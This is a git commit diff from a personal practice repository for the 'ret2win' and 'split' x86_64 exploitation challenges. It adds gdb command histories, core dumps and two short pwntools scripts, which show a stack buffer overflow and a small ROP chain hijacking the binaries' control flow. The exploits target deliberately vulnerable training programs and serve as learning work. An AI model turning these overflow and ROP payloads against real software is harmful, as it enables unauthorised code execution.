diff options
author | Brett Weiland <brett_weiland@bpcspace.com> | 2020-12-14 18:27:06 -0600 |
---|---|---|
committer | Brett Weiland <brett_weiland@bpcspace.com> | 2020-12-14 18:27:06 -0600 |
commit | ae586f332c3fa2919fca99b0ff8acf1e339b0061 (patch) | |
tree | 1a91dbbf26977db4492d9f752231c5bc3a358506 /x86_64 | |
parent | c9f44615e78db425febfdc3b601b90d2a3df7456 (diff) |
new file: x86_64/ret2win/.gdb_history
new file: x86_64/ret2win/core
new file: x86_64/ret2win/exploit.py
new file: x86_64/split/.gdb_history
new file: x86_64/split/core
new file: x86_64/split/core.split.25050
new file: x86_64/split/exploit.py
new file: x86_64/split/fuckyou
new file: x86_64/split/xaa
Diffstat (limited to 'x86_64')
-rw-r--r-- | x86_64/ret2win/.gdb_history | 6 | ||||
-rw-r--r-- | x86_64/ret2win/core | bin | 0 -> 2183168 bytes | |||
-rwxr-xr-x | x86_64/ret2win/exploit.py | 13 | ||||
-rw-r--r-- | x86_64/split/.gdb_history | 256 | ||||
-rw-r--r-- | x86_64/split/core | bin | 0 -> 2183168 bytes | |||
-rw-r--r-- | x86_64/split/core.split.25050 | bin | 0 -> 7067872 bytes | |||
-rwxr-xr-x | x86_64/split/exploit.py | 17 | ||||
-rw-r--r-- | x86_64/split/fuckyou | bin | 0 -> 64 bytes | |||
-rw-r--r-- | x86_64/split/xaa | bin | 0 -> 50 bytes |
9 files changed, 292 insertions, 0 deletions
diff --git a/x86_64/ret2win/.gdb_history b/x86_64/ret2win/.gdb_history new file mode 100644 index 0000000..54449f7 --- /dev/null +++ b/x86_64/ret2win/.gdb_history @@ -0,0 +1,6 @@ +starti +context +nexti +break main +continue +q diff --git a/x86_64/ret2win/core b/x86_64/ret2win/core Binary files differnew file mode 100644 index 0000000..4a61a20 --- /dev/null +++ b/x86_64/ret2win/core diff --git a/x86_64/ret2win/exploit.py b/x86_64/ret2win/exploit.py new file mode 100755 index 0000000..d5506b2 --- /dev/null +++ b/x86_64/ret2win/exploit.py @@ -0,0 +1,13 @@ +#!/usr/bin/env python3 +from pwn import * + +prog = process('./ret2win') +payload = b'' +for c in range(40): + payload += b'a' + +payload += p64(0x0000000000400756) +payload += b"\n" +prog.sendline(payload) +sleep(1) +print(str(prog.recv(), 'UTF-8')) diff --git a/x86_64/split/.gdb_history b/x86_64/split/.gdb_history new file mode 100644 index 0000000..7bd75aa --- /dev/null +++ b/x86_64/split/.gdb_history @@ -0,0 +1,256 @@ +print (char)usefulString +print (char&)usefulString +print (char*)usefulString +print (char)*usefulString +print (charusefulString +print (char)usefulString +print (char*)usefulString +print (char)*usefulString +quit +exit +quit +nexti +exit +quit +exit +quit +quit +exit +quit +context +next +continue +context +quit +nexti +continu +context +q +context +run +break main +continue +context +nexti +backtrace +set exception-debugger on +continue +quit +stepi +ret +return +stepi +break +delete +run +continue +clear +delete +continue +clear +delete +continue +delete 0x7f992453fece +delete 0 +delete 1 +delete 2 +delete 3 +quit +continue +context +q +context +q +quit +continue +context +continue +q +q +break main +continue +context +nexti +stepi +quit +break main +run +conitnue +continue +context +stepi +nexti +stepi +return +stepi +return +stepi +ret +return +stepi +return +stepi +stepi +info breakpoints +stepi +return +stepi +nexti +break 0x400706 +break *0x400706 +quit +continue +context +q +continue +context +continue +quit +continue +continue +quit +continue +context +quit +continue +quit +exit +quit +nexti +continue +quit +continue +quit +break pwnme +nexti +continue +bexti +nexti +quit +quit +continue +quit +continue +nexti +quit +continue +q +continue +quit +continue +[ +quit +start < fuckyou +continue +q +break *0x0x000000000040074b +break *0x000000000040074b +run < fuckyou +context +x/s 0x7fffffffdb20 +x/s 0x7fffffffdb20 - 20 +x/s 0x7fffffffdb2 +quit +break *0x000000000040074b +run < fuckyou +context +x/s 0x7fffffffdb20 +x/s 0x7fffffffdb20 - 8 +x/s 0x7fffffffdb20 +x/s 0x7fffffffdb20 - 8 +x/s 0x7fffffffdb20 + 8 +quit +quit +run < fuckyou +quit +break *0x000000000040074b +run < fuckyou +context +stepi +q +break *0x000000000040074b +run < fuckyou +context +q +break *0x000000000040074b +run < fuckyou +context +x 0x7fffffffdb20-8 +x 0x7ffff7fad800 +q +break pwnme +run < fuckyou +nexti +q +break pwnme +run +q +break pwnme +run < fuckyou +context +nexti +q +break pwnme +run < fuckyou +nexti +x/100c 0x7ffff7fad800 +context +nexti +quit +break *0x00000000004007c3 +run < fuckyou +context +nexti +stepi +q +break pwnme +start < fuckyou +context +stepi +return +context +break pwnme +continue +q +break pwnme +run < fuckyou +context +nexti +stepi +q +continue +quit +continue +[A +quit +q +info break +nexti +break main +continue +nexti +return +nexti +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +continue +q +continue +nexti +q +continue +nexti +continue +quit diff --git a/x86_64/split/core b/x86_64/split/core Binary files differnew file mode 100644 index 0000000..cf4e312 --- /dev/null +++ b/x86_64/split/core diff --git a/x86_64/split/core.split.25050 b/x86_64/split/core.split.25050 Binary files differnew file mode 100644 index 0000000..6acafe1 --- /dev/null +++ b/x86_64/split/core.split.25050 diff --git a/x86_64/split/exploit.py b/x86_64/split/exploit.py new file mode 100755 index 0000000..0340b77 --- /dev/null +++ b/x86_64/split/exploit.py @@ -0,0 +1,17 @@ +#!/usr/bin/env python3 +from pwn import * + + +context.binary = "./split" +prog = process('./split') +payload = b'' + +for c in range(40): #originally 40 + payload += b'a' + +payload += p64(0x00000000004007c3) +payload += p64(0x0000000000601060) # usefulString +payload += p64(0x000000000040074b) # usefulFunction + offset + +prog.sendline(payload) +prog.interactive() diff --git a/x86_64/split/fuckyou b/x86_64/split/fuckyou Binary files differnew file mode 100644 index 0000000..d25275b --- /dev/null +++ b/x86_64/split/fuckyou diff --git a/x86_64/split/xaa b/x86_64/split/xaa Binary files differnew file mode 100644 index 0000000..f1294fd --- /dev/null +++ b/x86_64/split/xaa |